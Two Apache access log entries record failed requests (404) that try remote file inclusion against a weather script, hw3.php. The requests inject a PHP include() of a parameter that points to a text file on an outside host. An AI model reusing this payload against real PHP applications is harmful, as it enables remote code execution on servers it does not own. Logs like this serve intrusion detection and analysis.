70.38.117.233 - - [03/May/2010:05:08:52 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
70.38.117.233 - - [03/May/2010:05:08:52 -0500] "GET /logs/access_log.1270684800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
